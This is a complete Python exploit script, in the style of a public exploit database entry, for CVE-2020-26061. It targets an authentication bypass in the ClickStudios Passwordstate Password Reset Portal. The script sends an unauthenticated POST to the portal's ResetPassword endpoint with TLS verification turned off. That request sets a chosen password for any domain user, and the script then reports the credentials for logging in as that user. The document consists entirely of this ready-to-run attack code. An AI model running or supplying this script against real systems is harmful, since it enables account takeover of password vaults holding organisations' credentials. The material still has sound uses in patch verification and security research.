#############################################################################################################################################
# Exploit Title: ClickStudios Passwordstate Password Reset Portal Authentication Bypass
# Date: 2020-10-05
# Exploit Author: Jason Juntunen (missingnull) https://github.com/missing0x00
# Software Link: https://www.clickstudios.com.au/passwordstate-changelog.aspx
# Version: ClickStudios Passwordstate Password Reset Portal Before 8.5 build 8501
# CVE: CVE-2020-26061
#############################################################################################################################################

# !/usr/bin/env python
import requests
import argparse

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(add_help = True, description = "Exploit for CVE-2020-26061 - PasswordState Password Reset Portal Authentication Bypass")

parser.add_argument('-t', help='Target URL', dest='TARGET', type=str, required=True)
parser.add_argument('-d', help='Domain', dest='DOMAIN', type=str, required=True)
parser.add_argument('-u', help='User Name', dest='USERNAME', type=str, required=True)
parser.add_argument('-p', help='New Password', dest='PASSWORD', type=str, default='m!ss!ngNULL0x00')
args = parser.parse_args()
base_url = args.TARGET
domain = args.DOMAIN
name = args.USERNAME
new_pass = args.PASSWORD

user_name = domain + '\\' + name

session = requests.Session()

reset_url = base_url + "/account/ResetPassword"
http_headers = {
		"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
		"Accept": "application/json, text/javascript, */*; q=0.01",
		"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
		"X-Requested-With": "XMLHttpRequest",
		"Connection":"Close"
		}
http_data = {"user_name": user_name, "Password": new_pass, "ConfirmPassword": new_pass}
r = session.post(reset_url, headers=http_headers, data=http_data, verify=False, timeout=60)
print(r.text)

if '"Success":true' in r.text:
	print("Done! You can now log in as " + user_name + ":" + new_pass)
else:
	print("Error! Check your domain/username, otherwise application may be patched.")